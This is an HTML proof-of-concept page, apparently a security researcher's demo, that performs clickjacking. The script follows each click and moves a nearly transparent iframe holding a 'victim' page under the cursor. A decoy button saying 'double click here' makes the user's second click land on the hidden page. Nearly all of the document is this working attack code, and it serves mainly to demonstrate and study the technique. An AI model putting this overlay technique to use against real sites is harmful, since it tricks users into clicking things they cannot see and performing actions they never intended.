<h1>Attacker</h1>
<script>
function get_position(e) {
	e = e || window.event;
	var cursor = {x:0, y:0};

	if (e.pageX || e.pageY) {
		cursor.x = e.pageX;
		cursor.y = e.pageY;
	} else {
		var de = document.documentElement;
		var b = document.body;
		cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
		cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
	}

	return cursor;
}

function onclick_event_handler(e) {
        var f = document.getElementById('victim');

	var c = get_position(e);

	f.setAttribute('style', 'opacity:0.10;position:absolute;top:' + (c.y - 80) + ';left:' + (c.x - 15) + ';');
}

window.captureEvents(Event.CLICK);
window.onclick=onclick_event_handler;
</script>
<iframe id="victim" src="victim01.htm" style="opacity:0.10;position:absolute;left:10;bottom:10"></iframe>
<input type="button" value="double click here">
<p><a href="victim01.htm">open just the victim page</a></p>

<!-- codded by pdp|gnucitizen -->
